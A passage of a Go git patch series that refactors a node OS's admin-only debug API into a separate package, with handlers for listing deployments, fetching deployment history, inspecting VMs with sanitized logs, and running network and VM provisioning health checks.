pid*10 + int(r-'0') + } + if pid == 0 { + continue + } + + cmdline, err := os.ReadFile(filepath.Join("/proc", dir, "cmdline")) + if err != nil || len(cmdline) == 0 { + continue + } + s := string(cmdline) + if strings.Contains(s, binary) && strings.Contains(s, needle) { + return true, pid + } + } + return false, 0 +} diff --git a/pkg/zos_api/routes.go b/pkg/zos_api/routes.go index d8d2e6fe..5792f714 100644 --- a/pkg/zos_api/routes.go +++ b/pkg/zos_api/routes.go @@ -18,6 +18,8 @@ func (g *ZosAPI) SetupRoutes(router *peer.Router) { debug.Use(g.adminAuthorized) debugDeployments := debug.SubRoute("deployments") debugDeployments.WithHandler("list", g.debugDeploymentsListHandler) + debugProvisioning := debug.SubRoute("provisioning") + debugProvisioning.WithHandler("health", g.debugProvisioningHealthHandler) debugVM := debug.SubRoute("vm") debugVM.WithHandler("info", g.debugVMInfoHandler) debugDeployment := debug.SubRoute("deployment") From 6d1db607d006ac6eb7615df778a3ac53a2456c96 Mon Sep 17 00:00:00 2001 From: Omar Abdulaziz Date: Thu, 18 Dec 2025 17:38:48 +0200 Subject: [PATCH 4/8] refactor: add debug commands for deployment retrieval, listing, and VM info --- pkg/debugcmd/deployment_get.go | 73 ++++ pkg/debugcmd/deployments_list.go | 72 ++++ pkg/debugcmd/deps.go | 36 ++ pkg/debugcmd/provisioning_health.go | 392 +++++++++++++++++ pkg/debugcmd/vm_info.go | 105 +++++ pkg/zos_api/debug.go | 640 +--------------------------- 6 files changed, 696 insertions(+), 622 deletions(-) create mode 100644 pkg/debugcmd/deployment_get.go create mode 100644 pkg/debugcmd/deployments_list.go create mode 100644 pkg/debugcmd/deps.go create mode 100644 pkg/debugcmd/provisioning_health.go create mode 100644 pkg/debugcmd/vm_info.go diff --git a/pkg/debugcmd/deployment_get.go b/pkg/debugcmd/deployment_get.go new file mode 100644 index 00000000..f76a274b --- /dev/null +++ b/pkg/debugcmd/deployment_get.go @@ -0,0 +1,73 @@ +package debugcmd + +import ( + "context" + "encoding/json" + "fmt" + + "github.com/threefoldtech/zosbase/pkg/gridtypes" +) + +type DeploymentGetRequest struct { + TwinID uint32 `json:"twin_id"` + ContractID uint64 `json:"contract_id"` + WithHistory bool `json:"withhistory"` +} + +type WorkloadTransaction struct { + Seq int `json:"seq"` + Type string `json:"type"` + Name string `json:"name"` + Created gridtypes.Timestamp `json:"created"` + State gridtypes.ResultState `json:"state"` + Message string `json:"message"` +} + +type DeploymentGetResponse struct { + Deployment gridtypes.Deployment `json:"deployment"` + History []WorkloadTransaction `json:"history,omitempty"` +} + +func ParseDeploymentGetRequest(payload []byte) (DeploymentGetRequest, error) { + var req DeploymentGetRequest + if err := json.Unmarshal(payload, &req); err != nil { + return req, err + } + return req, nil +} + +func DeploymentGet(ctx context.Context, deps Deps, req DeploymentGetRequest) (DeploymentGetResponse, error) { + if req.TwinID == 0 { + return DeploymentGetResponse{}, fmt.Errorf("twin_id is required") + } + if req.ContractID == 0 { + return DeploymentGetResponse{}, fmt.Errorf("contract_id is required") + } + + deployment, err := deps.Provision.Get(ctx, req.TwinID, req.ContractID) + if err != nil { + return DeploymentGetResponse{}, err + } + if !req.WithHistory { + return DeploymentGetResponse{Deployment: deployment}, nil + } + + history, err := deps.Provision.Changes(ctx, req.TwinID, req.ContractID) + if err != nil { + return DeploymentGetResponse{}, err + } + + transactions := make([]WorkloadTransaction, 0, len(history)) + for idx, wl := range history { + transactions = append(transactions, WorkloadTransaction{ + Seq: idx + 1, + Type: string(wl.Type), + Name: string(wl.Name), + Created: wl.Result.Created, + State: wl.Result.State, + Message: wl.Result.Error, + }) + } + + return DeploymentGetResponse{Deployment: deployment, History: transactions}, nil +} diff --git a/pkg/debugcmd/deployments_list.go b/pkg/debugcmd/deployments_list.go new file mode 100644 index 00000000..b1e9b5be --- /dev/null +++ b/pkg/debugcmd/deployments_list.go @@ -0,0 +1,72 @@ +package debugcmd + +import ( + "context" + "encoding/json" +) + +type DeploymentsListRequest struct { + TwinID uint32 `json:"twin_id"` +} + +type DeploymentsListWorkload struct { + Type string `json:"type"` + Name string `json:"name"` + State string `json:"state"` +} + +type DeploymentsListItem struct { + TwinID uint32 `json:"twin_id"` + ContractID uint64 `json:"contract_id"` + Workloads []DeploymentsListWorkload `json:"workloads"` +} + +type DeploymentsListResponse struct { + Items []DeploymentsListItem `json:"items"` +} + +func ParseDeploymentsListRequest(payload []byte) (DeploymentsListRequest, error) { + var req DeploymentsListRequest + if len(payload) == 0 { + return req, nil + } + // optional payload + _ = json.Unmarshal(payload, &req) + return req, nil +} + +func DeploymentsList(ctx context.Context, deps Deps, req DeploymentsListRequest) (DeploymentsListResponse, error) { + twins := []uint32{req.TwinID} + if req.TwinID == 0 { + var err error + twins, err = deps.Provision.ListTwins(ctx) + if err != nil { + return DeploymentsListResponse{}, err + } + } + + items := make([]DeploymentsListItem, 0) + for _, twin := range twins { + deployments, err := deps.Provision.List(ctx, twin) + if err != nil { + return DeploymentsListResponse{}, err + } + for _, d := range deployments { + workloads := make([]DeploymentsListWorkload, 0, len(d.Workloads)) + for _, wl := range d.Workloads { + workloads = append(workloads, DeploymentsListWorkload{ + Type: string(wl.Type), + Name: string(wl.Name), + State: string(wl.Result.State), + }) + } + items = append(items, DeploymentsListItem{ + TwinID: d.TwinID, + ContractID: d.ContractID, + Workloads: workloads, + }) + } + } + + return DeploymentsListResponse{Items: items}, nil +} diff --git a/pkg/debugcmd/deps.go b/pkg/debugcmd/deps.go new file mode 100644 index 00000000..e1d8f5fe --- /dev/null +++ b/pkg/debugcmd/deps.go @@ -0,0 +1,36 @@ +package debugcmd + +import ( + "context" + + "github.com/threefoldtech/zosbase/pkg" + "github.com/threefoldtech/zosbase/pkg/gridtypes" + "github.com/threefoldtech/zosbase/pkg/gridtypes/zos" +) + +// Provision is the subset of the provision zbus interface used by debug commands. +type Provision interface { + ListTwins(ctx context.Context) ([]uint32, error) + List(ctx context.Context, twin uint32) ([]gridtypes.Deployment, error) + Get(ctx context.Context, twin uint32, contract uint64) (gridtypes.Deployment, error) + Changes(ctx context.Context, twin uint32, contract uint64) ([]gridtypes.Workload, error) +} + +// VM is the subset of the vmd zbus interface used by debug commands. +type VM interface { + Exists(ctx context.Context, id string) bool + Inspect(ctx context.Context, id string) (pkg.VMInfo, error) + Logs(ctx context.Context, id string) (string, error) + LogsFull(ctx context.Context, id string) (string, error) +} + +// Network is the subset of the network zbus interface used by debug commands. +type Network interface { + Namespace(ctx context.Context, id zos.NetID) string +} + +type Deps struct { + Provision Provision + VM VM + Network Network +} diff --git a/pkg/debugcmd/provisioning_health.go b/pkg/debugcmd/provisioning_health.go new file mode 100644 index 00000000..f3d3a0a2 --- /dev/null +++ b/pkg/debugcmd/provisioning_health.go @@ -0,0 +1,392 @@ +package debugcmd + +import ( + "context" + "encoding/json" + "fmt" + "os" + "path/filepath" + "strings" + + cnins "github.com/containernetworking/plugins/pkg/ns" + "github.com/threefoldtech/zosbase/pkg" + "github.com/threefoldtech/zosbase/pkg/gridtypes" + "github.com/threefoldtech/zosbase/pkg/gridtypes/zos" + "github.com/threefoldtech/zosbase/pkg/network/namespace" + "github.com/threefoldtech/zosbase/pkg/network/nr" + "github.com/threefoldtech/zosbase/pkg/versioned" + "github.com/threefoldtech/zosbase/pkg/vm" + "github.com/threefoldtech/zosbase/pkg/zinit" + "github.com/vishvananda/netlink" +) + +type ProvisioningHealthRequest struct { + TwinID uint32 `json:"twin_id"` + ContractID uint64 `json:"contract_id"` +} + +type HealthStatus string + +const ( + HealthHealthy HealthStatus = "healthy" + HealthDegraded HealthStatus = "degraded" + HealthUnhealthy HealthStatus = "unhealthy" +) + +type HealthCheck struct { + Name string `json:"name"` + OK bool `json:"ok"` + Message string `json:"message,omitempty"` + Evidence map[string]interface{} `json:"evidence,omitempty"` +} + +type WorkloadHealth struct { + WorkloadID string `json:"workload_id"` + Type string `json:"type"` + Name string `json:"name"` + Status HealthStatus `json:"status"` + Checks []HealthCheck `json:"checks"` +} + +type ProvisioningHealthResponse struct { + TwinID uint32 `json:"twin_id"` + ContractID uint64 `json:"contract_id"` + Workloads []WorkloadHealth `json:"workloads"` +} + +func ParseProvisioningHealthRequest(payload []byte) (ProvisioningHealthRequest, error) { + var req ProvisioningHealthRequest + if err := json.Unmarshal(payload, &req); err != nil { + return req, err + } + return req, nil +} + +func ProvisioningHealth(ctx context.Context, deps Deps, req ProvisioningHealthRequest) (ProvisioningHealthResponse, error) { + if req.TwinID == 0 { + return ProvisioningHealthResponse{}, fmt.Errorf("twin_id is required") + } + if req.ContractID == 0 { + return ProvisioningHealthResponse{}, fmt.Errorf("contract_id is required") + } + + deployment, err := deps.Provision.Get(ctx, req.TwinID, req.ContractID) + if err != nil { + return ProvisioningHealthResponse{}, fmt.Errorf("failed to get deployment: %w", err) + } + + out := ProvisioningHealthResponse{TwinID: req.TwinID, ContractID: req.ContractID} + for _, wl := range deployment.Workloads { + switch wl.Type { + case zos.NetworkType: + out.Workloads = append(out.Workloads, checkNetworkWorkload(ctx, deps, req.TwinID, req.ContractID, wl)) + case zos.ZMachineType, zos.ZMachineLightType: + out.Workloads = append(out.Workloads, checkZMachineWorkload(ctx, deps, req.TwinID, req.ContractID, wl)) + default: + } + } + + return out, nil +} + +type checkBuilder struct { + checks []HealthCheck +} + +func (b *checkBuilder) add(name string, ok bool, msg string, evidence map[string]interface{}) { + b.checks = append(b.checks, HealthCheck{Name: name, OK: ok, Message: msg, Evidence: evidence}) +} + +func (b *checkBuilder) status() HealthStatus { + fail := 0 + for _, c := range b.checks { + if !c.OK { + fail++ + } + } + if fail == 0 { + return HealthHealthy + } + if fail == 1 { + return HealthDegraded + } + return HealthUnhealthy +} + +func checkNetworkWorkload(ctx context.Context, deps Deps, twin uint32, contract uint64, wl gridtypes.Workload) WorkloadHealth { + const ( + networkdVolatileDir = "/var/run/cache/networkd" + networksDir = "networks" + myceliumKeyDir = "mycelium-key" + + prefixBridgeMycelium = "m-" + prefixTap = "t-" + + ifaceMyceliumBridge = "br-my" + ifaceMyceliumTun = "my" + ifacePublic = "public" + ) + + netID := zos.NetworkID(twin, wl.Name) + workloadID, _ := gridtypes.NewWorkloadID(twin, contract, wl.Name) + + var b checkBuilder + b.checks = make([]HealthCheck, 0, 16) + + netCfgPath := filepath.Join(networkdVolatileDir, networksDir, netID.String()) + ver, raw, err := versioned.ReadFile(netCfgPath) + if err != nil { + b.add("network.config.read", false, fmt.Sprintf("failed to read network config file: %v", err), map[string]interface{}{"path": netCfgPath, "netid": netID.String()}) + } + var netCfg pkg.Network + if err == nil { + if err := json.Unmarshal(raw, &netCfg); err != nil { + b.add("network.config.parse", false, fmt.Sprintf("failed to parse network config file: %v", err), map[string]interface{}{"path": netCfgPath, "version": ver.String()}) + } else if netCfg.NetID != netID { + b.add("network.config.netid", false, "network config netid mismatch", map[string]interface{}{"expected": netID.String(), "got": netCfg.NetID.String(), "path": netCfgPath, "version": ver.String()}) + } else { + b.add("network.config.netid", true, "network config exists and matches netid", map[string]interface{}{"path": netCfgPath, "netid": netID.String(), "version": ver.String()}) + } + } + myceliumConfigured := netCfg.Mycelium != nil + + nsName := deps.Network.Namespace(ctx, netID) + if !namespace.Exists(nsName) { + b.add("network.netns.exists", false, "network namespace not found", map[string]interface{}{"namespace": nsName}) + } else { + b.add("network.netns.exists", true, "network namespace exists", map[string]interface{}{"namespace": nsName}) + } + + nrr := nr.New(pkg.Network{NetID: netID}, filepath.Join(networkdVolatileDir, myceliumKeyDir)) + wgIface, _ := nrr.WGName() + nrIface, _ := nrr.NRIface() + brName, _ := nrr.BridgeName() + myBridgeName := fmt.Sprintf("%s%s", prefixBridgeMycelium, netID.String()) + + netnsLinks := map[string]struct{}{} + if netNS, err := namespace.GetByName(nsName); err != nil { + b.add("network.netns.links", false, fmt.Sprintf("failed to open netns: %v", err), map[string]interface{}{"namespace": nsName}) + } else { + _ = netNS.Do(func(_ cnins.NetNS) error { + links, err := netlink.LinkList() + if err != nil { + return err + } + for _, l := range links { + netnsLinks[l.Attrs().Name] = struct{}{} + } + return nil + }) + _ = netNS.Close() + } + + _, hasWg := netnsLinks[wgIface] + _, hasNr := netnsLinks[nrIface] + _, hasPublic := netnsLinks[ifacePublic] + b.add("network.netns.iface.wg", hasWg, "wireguard interface presence in netns", map[string]interface{}{"namespace": nsName, "iface": wgIface}) + b.add("network.netns.iface.nr", hasNr, "netresource interface presence in netns", map[string]interface{}{"namespace": nsName, "iface": nrIface}) + b.add("network.netns.iface.public", hasPublic, "public iface presence in netns", map[string]interface{}{"namespace": nsName, "iface": ifacePublic}) + if myceliumConfigured { + _, hasBrMy := netnsLinks[ifaceMyceliumBridge] + _, hasMy := netnsLinks[ifaceMyceliumTun] + b.add("network.netns.iface.br-my", hasBrMy, "mycelium bridge iface presence in netns", map[string]interface{}{"namespace": nsName, "iface": ifaceMyceliumBridge}) + b.add("network.netns.iface.my", hasMy, "mycelium tun iface presence in netns", map[string]interface{}{"namespace": nsName, "iface": ifaceMyceliumTun}) + } + + if _, err := os.Stat(filepath.Join("/sys/class/net", brName)); err != nil { + b.add("network.bridge.exists", false, fmt.Sprintf("network bridge missing: %v", err), map[string]interface{}{"bridge": brName}) + } else { + b.add("network.bridge.exists", true, "network bridge exists", map[string]interface{}{"bridge": brName}) + } + if myceliumConfigured { + if _, err := os.Stat(filepath.Join("/sys/class/net", myBridgeName)); err != nil { + b.add("network.mycelium_bridge.exists", false, fmt.Sprintf("mycelium bridge missing: %v", err), map[string]interface{}{"bridge": myBridgeName}) + } else { + b.add("network.mycelium_bridge.exists", true, "mycelium bridge exists", map[string]interface{}{"bridge": myBridgeName}) + } + } + + checkBridgeMembers := func(checkPrefix, bridge string) { + brifDir := filepath.Join("/sys/class/net", bridge, "brif") + ents, err := os.ReadDir(brifDir) + if err != nil { + b.add(checkPrefix+".members", false, fmt.Sprintf("failed to read bridge members: %v", err), map[string]interface{}{"bridge": bridge, "path": brifDir}) + return + } + members := make([]string, 0, len(ents)) + for _, e := range ents { + members = append(members, e.Name()) + } + if len(members) == 0 { + b.add(checkPrefix+".members", false, "bridge has no attached interfaces", map[string]interface{}{"bridge": bridge}) + return + } + b.add(checkPrefix+".members", true, "bridge has attached interfaces", map[string]interface{}{"bridge": bridge, "members": members}) + + for _, m := range members { + if !strings.HasPrefix(m, prefixTap) { + b.add(checkPrefix+".member.tap_prefix", false, "bridge member does not have expected tap prefix (t-)", map[string]interface{}{"bridge": bridge, "member": m}) + } else { + b.add(checkPrefix+".member.tap_prefix", true, "bridge member has expected tap prefix (t-)", map[string]interface{}{"bridge": bridge, "member": m}) + } + + oper := filepath.Join("/sys/class/net", m, "operstate") + ob, err := os.ReadFile(oper) + if err != nil { + b.add(checkPrefix+".member.operstate", false, fmt.Sprintf("failed to read operstate: %v", err), map[string]interface{}{"bridge": bridge, "member": m, "path": oper}) + continue + } + state := strings.TrimSpace(string(ob)) + b.add(checkPrefix+".member.operstate", state == "up", "member operstate", map[string]interface{}{"bridge": bridge, "member": m, "operstate": state}) + } + } + + checkBridgeMembers("network.bridge", brName) + if myceliumConfigured { + checkBridgeMembers("network.mycelium_bridge", myBridgeName) + } + + if myceliumConfigured { + service := fmt.Sprintf("mycelium-%s", netID.String()) + z := zinit.Default() + exists, err := z.Exists(service) + if err != nil { + b.add("network.mycelium.service.exists", false, fmt.Sprintf("failed to query zinit: %v", err), map[string]interface{}{"service": service}) + } else if !exists { + b.add("network.mycelium.service.exists", false, "mycelium service is not monitored in zinit", map[string]interface{}{"service": service}) + } else { + st, err := z.Status(service) + if err != nil { + b.add("network.mycelium.service.status", false, fmt.Sprintf("failed to get service status: %v", err), map[string]interface{}{"service": service}) + } else { + b.add("network.mycelium.service.running", st.State.Is(zinit.ServiceStateRunning), "mycelium service state", map[string]interface{}{"service": service, "state": st.State.String(), "pid": st.Pid}) + } + } + } else { + b.add("network.mycelium.configured", true, "mycelium not configured for this network (skipped service check)", map[string]interface{}{"netid": netID.String()}) + } + + return WorkloadHealth{ + WorkloadID: workloadID.String(), + Type: string(wl.Type), + Name: string(wl.Name), + Status: b.status(), + Checks: b.checks, + } +} + +func checkZMachineWorkload(ctx context.Context, deps Deps, twin uint32, contract uint64, wl gridtypes.Workload) WorkloadHealth { + workloadID, _ := gridtypes.NewWorkloadID(twin, contract, wl.Name) + vmID := workloadID.String() + + var b checkBuilder + b.checks = make([]HealthCheck, 0, 16) + + const vmdVolatileDir = "/var/run/cache/vmd" + cfgPath := filepath.Join(vmdVolatileDir, vmID) + if _, err := os.Stat(cfgPath); err != nil { + b.add("vm.config.exists", false, fmt.Sprintf("vm config missing: %v", err), map[string]interface{}{"path": cfgPath}) + } else { + b.add("vm.config.exists", true, "vm config exists", map[string]interface{}{"path": cfgPath}) + } + + b.add("vm.vmd.exists", deps.VM.Exists(ctx, vmID), "vmd reports VM exists", map[string]interface{}{"vm_id": vmID}) + + if ps, err := vm.Find(vmID); err != nil { + b.add("vm.process.cloud_hypervisor", false, fmt.Sprintf("cloud-hypervisor process not found: %v", err), map[string]interface{}{"vm_id": vmID}) + } else { + b.add("vm.process.cloud_hypervisor", true, "cloud-hypervisor process found", map[string]interface{}{"vm_id": vmID, "pid": ps.Pid}) + } + + machine, err := vm.MachineFromFile(cfgPath) + hasConsole := false + if err != nil { + b.add("vm.config.parse", false, fmt.Sprintf("failed to parse vm config: %v", err), map[string]interface{}{"path": cfgPath}) + } else { + for _, nic := range machine.Interfaces { + if nic.Console != nil { + hasConsole = true + break + } + } + + for _, d := range machine.Disks { + if d.Path == "" { + continue + } + if st, err := os.Stat(d.Path); err != nil { + b.add("vm.disk.exists", false, fmt.Sprintf("disk path missing: %v", err), map[string]interface{}{"path": d.Path}) + } else if st.Size() == 0 { + b.add("vm.disk.nonzero", false, "disk file size is 0", map[string]interface{}{"path": d.Path}) + } else { + b.add("vm.disk.ok", true, "disk path exists", map[string]interface{}{"path": d.Path, "bytes": st.Size()}) + } + } + + if len(machine.FS) == 0 { + b.add("vm.virtiofsd.required", true, "no virtiofs shares configured (skipped virtiofsd check)", nil) + } else { + for i := range machine.FS { + sock := filepath.Join("/var/run", fmt.Sprintf("virtio-%s-%d.socket", vmID, i)) + if _, err := os.Stat(sock); err != nil { + b.add("vm.virtiofsd.socket", false, fmt.Sprintf("virtiofs socket missing: %v", err), map[string]interface{}{"socket": sock}) + } else { + b.add("vm.virtiofsd.socket", true, "virtiofs socket exists", map[string]interface{}{"socket": sock}) + } + } + } + } + + if err == nil { + if hasConsole { + if ok, pid := processExistsByName("cloud-console", vmID); !ok { + b.add("vm.process.cloud_console", false, "cloud-console process not found (best-effort)", map[string]interface{}{"vm_id": vmID}) + } else { + b.add("vm.process.cloud_console", true, "cloud-console process found (best-effort)", map[string]interface{}{"vm_id": vmID, "pid": pid}) + } + } else { + b.add("vm.console.configured", true, "vm has no console configured (skipped cloud-console check)", map[string]interface{}{"vm_id": vmID}) + } + } + + return WorkloadHealth{ + WorkloadID: workloadID.String(), + Type: string(wl.Type), + Name: string(wl.Name), + Status: b.status(), + Checks: b.checks, + } +} + +func processExistsByName(binary, needle string) (bool, int) { + entries, err := os.ReadDir("/proc") + if err != nil { + return false, 0 + } + for _, e := range entries { + if !e.IsDir() { + continue + } + dir := e.Name() + pid := 0 + for _, r := range dir { + if r < '0' || r > '9' { + pid = 0 + break + } + pid = pid*10 + int(r-'0') + } + if pid == 0 { + continue + } + cmdline, err := os.ReadFile(filepath.Join("/proc", dir, "cmdline")) + if err != nil || len(cmdline) == 0 { + continue + } + s := string(cmdline) + if strings.Contains(s, binary) && strings.Contains(s, needle) { + return true, pid + } + } + return false, 0 +} diff --git a/pkg/debugcmd/vm_info.go b/pkg/debugcmd/vm_info.go new file mode 100644 index 00000000..1fb364a3 --- /dev/null +++ b/pkg/debugcmd/vm_info.go @@ -0,0 +1,105 @@ +package debugcmd + +import ( + "context" + "encoding/json" + "fmt" + "strings" + "unicode/utf8" + + "github.com/threefoldtech/zosbase/pkg" + "github.com/threefoldtech/zosbase/pkg/gridtypes" + "github.com/threefoldtech/zosbase/pkg/gridtypes/zos" +) + +type VMInfoRequest struct { + TwinID uint32 `json:"twin_id"` + ContractID uint64 `json:"contract_id"` + VMName string `json:"vm_name"` + FullLogs bool `json:"full_logs"` +} + +type VMInfoResponse struct { + VMID string `json:"vm_id"` + Info pkg.VMInfo `json:"info"` + Logs string `json:"logs"` +} + +func ParseVMInfoRequest(payload []byte) (VMInfoRequest, error) { + var req VMInfoRequest + if err := json.Unmarshal(payload, &req); err != nil { + return req, err + } + return req, nil +} + +func VMInfo(ctx context.Context, deps Deps, req VMInfoRequest) (VMInfoResponse, error) { + if req.TwinID == 0 { + return VMInfoResponse{}, fmt.Errorf("twin_id is required") + } + if req.ContractID == 0 { + return VMInfoResponse{}, fmt.Errorf("contract_id is required") + } + if req.VMName == "" { + return VMInfoResponse{}, fmt.Errorf("vm_name is required") + } + + deployment, err := deps.Provision.Get(ctx, req.TwinID, req.ContractID) + if err != nil { + return VMInfoResponse{}, fmt.Errorf("failed to get deployment: %w", err) + } + vmwl, err := deployment.GetType(gridtypes.Name(req.VMName), zos.ZMachineType) + if err != nil { + return VMInfoResponse{}, fmt.Errorf("failed to get zmachine workload: %w", err) + } + vmID := vmwl.ID.String() + + info, err := deps.VM.Inspect(ctx, vmID) + if err != nil { + return VMInfoResponse{}, fmt.Errorf("failed to inspect vm: %w", err) + } + + var raw string + if req.FullLogs { + raw, err = deps.VM.LogsFull(ctx, vmID) + } else { + raw, err = deps.VM.Logs(ctx, vmID) + } + if err != nil { + return VMInfoResponse{}, fmt.Errorf("failed to get vm logs: %w", err) + } + + logs := sanitizeLogs(raw) + return VMInfoResponse{VMID: vmID, Info: info, Logs: logs}, nil +} + +func sanitizeLogs(raw string) string { + // Sanitize logs: + // - strip NUL bytes + // - drop invalid UTF-8 bytes + // - normalize CRLF -> LF + b := []byte(raw) + sanitized := make([]byte, 0, len(b)) + for _, c := range b { + if c != 0x00 { + sanitized = append(sanitized, c) + } + } + if !utf8.Valid(sanitized) { + valid := make([]byte, 0, len(sanitized)) + for len(sanitized) > 0 { + r, size := utf8.DecodeRune(sanitized) + if r == utf8.RuneError && size == 1 { + sanitized = sanitized[1:] + continue + } + valid = append(valid, sanitized[:size]...) + sanitized = sanitized[size:] + } + sanitized = valid + } + logs := string(sanitized) + logs = strings.ReplaceAll(logs, "\r\n", "\n") + logs = strings.ReplaceAll(logs, "\r", "\n") + return logs +} diff --git a/pkg/zos_api/debug.go b/pkg/zos_api/debug.go index abb6f01b..93dc0ece 100644 --- a/pkg/zos_api/debug.go +++ b/pkg/zos_api/debug.go @@ -2,650 +2,46 @@ package zosapi import ( "context" - "encoding/json" - "fmt" - "os" - "path/filepath" - "strings" - "unicode/utf8" - cnins "github.com/containernetworking/plugins/pkg/ns" - "github.com/threefoldtech/zosbase/pkg" - "github.com/threefoldtech/zosbase/pkg/gridtypes" - "github.com/threefoldtech/zosbase/pkg/gridtypes/zos" - "github.com/threefoldtech/zosbase/pkg/network/namespace" - "github.com/threefoldtech/zosbase/pkg/network/nr" - "github.com/threefoldtech/zosbase/pkg/versioned" - "github.com/threefoldtech/zosbase/pkg/vm" - "github.com/threefoldtech/zosbase/pkg/zinit" - "github.com/vishvananda/netlink" + "github.com/threefoldtech/zosbase/pkg/debugcmd" ) -type debugDeploymentsListItem struct { - TwinID uint32 `json:"twin_id"` - ContractID uint64 `json:"contract_id"` - Workloads []debugDeploymentsWorkload `json:"workloads"` -} - -type debugDeploymentsWorkload struct { - Type string `json:"type"` - Name string `json:"name"` - State string `json:"state"` -} - -type debugWorkloadTransaction struct { - Seq int `json:"seq"` - Type string `json:"type"` - Name string `json:"name"` - Created gridtypes.Timestamp `json:"created"` - State gridtypes.ResultState `json:"state"` - Message string `json:"message"` -} - func (g *ZosAPI) debugDeploymentsListHandler(ctx context.Context, payload []byte) (interface{}, error) { - var args struct { - TwinID uint32 `json:"twin_id"` - } - if len(payload) != 0 { - // optional filter - _ = json.Unmarshal(payload, &args) - } - - twins := []uint32{args.TwinID} - if args.TwinID == 0 { - var err error - twins, err = g.provisionStub.ListTwins(ctx) - if err != nil { - return nil, err - } - } - - items := make([]debugDeploymentsListItem, 0) - for _, twin := range twins { - deployments, err := g.provisionStub.List(ctx, twin) - if err != nil { - return nil, err - } - - for _, deployment := range deployments { - workloads := make([]debugDeploymentsWorkload, 0, len(deployment.Workloads)) - for _, wl := range deployment.Workloads { - workloads = append(workloads, debugDeploymentsWorkload{ - Type: string(wl.Type), - Name: string(wl.Name), - State: string(wl.Result.State), - }) - } - - items = append(items, debugDeploymentsListItem{ - TwinID: deployment.TwinID, - ContractID: deployment.ContractID, - Workloads: workloads, - }) - } - } - - return struct { - Items []debugDeploymentsListItem `json:"items"` - }{Items: items}, nil -} - -func (g *ZosAPI) debugDeploymentGetHandler(ctx context.Context, payload []byte) (interface{}, error) { - var args struct { - TwinID uint32 `json:"twin_id"` - ContractID uint64 `json:"contract_id"` - WithHistory bool `json:"withhistory"` - } - if err := json.Unmarshal(payload, &args); err != nil { - return nil, err - } - if args.TwinID == 0 { - return nil, fmt.Errorf("twin_id is required") - } - if args.ContractID == 0 { - return nil, fmt.Errorf("contract_id is required") - } - - deployment, err := g.provisionStub.Get(ctx, args.TwinID, args.ContractID) + req, err := debugcmd.ParseDeploymentsListRequest(payload) if err != nil { return nil, err } + return debugcmd.DeploymentsList(ctx, g.debugDeps(), req) +} - if !args.WithHistory { - return struct { - Deployment gridtypes.Deployment `json:"deployment"` - }{Deployment: deployment}, nil - } - - history, err := g.provisionStub.Changes(ctx, args.TwinID, args.ContractID) +func (g *ZosAPI) debugDeploymentGetHandler(ctx context.Context, payload []byte) (interface{}, error) { + req, err := debugcmd.ParseDeploymentGetRequest(payload) if err != nil { return nil, err } - - transactions := make([]debugWorkloadTransaction, 0, len(history)) - for idx, wl := range history { - transactions = append(transactions, debugWorkloadTransaction{ - Seq: idx + 1, - Type: string(wl.Type), - Name: string(wl.Name), - Created: wl.Result.Created, - State: wl.Result.State, - Message: wl.Result.Error, - }) - } - - return struct { - Deployment gridtypes.Deployment `json:"deployment"` - History []debugWorkloadTransaction `json:"history"` - }{ - Deployment: deployment, - History: transactions, - }, nil + return debugcmd.DeploymentGet(ctx, g.debugDeps(), req) } func (g *ZosAPI) debugVMInfoHandler(ctx context.Context, payload []byte) (interface{}, error) { - var args struct { - TwinID uint32 `json:"twin_id"` - ContractID uint64 `json:"contract_id"` - VMName string `json:"vm_name"` - FullLogs bool `json:"full_logs"` - } - if err := json.Unmarshal(payload, &args); err != nil { - return nil, err - } - if args.TwinID == 0 { - return nil, fmt.Errorf("twin_id is required") - } - if args.ContractID == 0 { - return nil, fmt.Errorf("contract_id is required") - } - if args.VMName == "" { - return nil, fmt.Errorf("vm_name is required") - } - - deployment, err := g.provisionStub.Get(ctx, args.TwinID, args.ContractID) + req, err := debugcmd.ParseVMInfoRequest(payload) if err != nil { - return nil, fmt.Errorf("failed to get deployment: %w", err) - } - - vm, err := deployment.GetType(gridtypes.Name(args.VMName), zos.ZMachineType) - if err != nil { - return nil, fmt.Errorf("failed to get zmachine workload: %w", err) - } - vmID := vm.ID.String() - - info, err := g.vmStub.Inspect(ctx, vmID) - if err != nil { - return nil, fmt.Errorf("failed to inspect vm: %w", err) - } - - // Logs: tailed by default, full only when requested. - var raw string - if args.FullLogs { - raw, err = g.vmStub.LogsFull(ctx, vmID) - } else { - raw, err = g.vmStub.Logs(ctx, vmID) - } - if err != nil { - return nil, fmt.Errorf("failed to get vm logs: %w", err) - } - - // Sanitize logs: - // - strip NUL bytes - // - drop invalid UTF-8 bytes - // - normalize CRLF -> LF - b := []byte(raw) - sanitized := make([]byte, 0, len(b)) - for _, c := range b { - if c != 0x00 { - sanitized = append(sanitized, c) - } - } - if !utf8.Valid(sanitized) { - valid := make([]byte, 0, len(sanitized)) - for len(sanitized) > 0 { - r, size := utf8.DecodeRune(sanitized) - if r == utf8.RuneError && size == 1 { - sanitized = sanitized[1:] - continue - } - valid = append(valid, sanitized[:size]...) - sanitized = sanitized[size:] - } - sanitized = valid - } - logs := string(sanitized) - logs = strings.ReplaceAll(logs, "\r\n", "\n") - logs = strings.ReplaceAll(logs, "\r", "\n") - - return struct { - VMID string `json:"vm_id"` - Info pkg.VMInfo `json:"info"` - Logs string `json:"logs"` - }{ - VMID: vmID, - Info: info, - Logs: logs, - }, nil -} - -type debugHealthStatus string - -const ( - debugHealthHealthy debugHealthStatus = "healthy" - debugHealthDegraded debugHealthStatus = "degraded" - debugHealthUnhealthy debugHealthStatus = "unhealthy" -) - -type debugHealthCheck struct { - Name string `json:"name"` - OK bool `json:"ok"` - Message string `json:"message,omitempty"` - Evidence map[string]interface{} `json:"evidence,omitempty"` -} - -type debugWorkloadHealth struct { - WorkloadID string `json:"workload_id"` - Type string `json:"type"` - Name string `json:"name"` - Status debugHealthStatus `json:"status"` - Checks []debugHealthCheck `json:"checks"` -} - -type debugCheckBuilder struct { - checks []debugHealthCheck -} - -func (b *debugCheckBuilder) add(name string, ok bool, msg string, evidence map[string]interface{}) { - b.checks = append(b.checks, debugHealthCheck{ - Name: name, - OK: ok, - Message: msg, - Evidence: evidence, - }) -} - -func (b *debugCheckBuilder) status() debugHealthStatus { - return summarizeHealth(b.checks) -} - -func (g *ZosAPI) debugProvisioningHealthHandler(ctx context.Context, payload []byte) (interface{}, error) { - var args struct { - TwinID uint32 `json:"twin_id"` - ContractID uint64 `json:"contract_id"` - } - if err := json.Unmarshal(payload, &args); err != nil { return nil, err } - if args.TwinID == 0 { - return nil, fmt.Errorf("twin_id is required") - } - if args.ContractID == 0 { 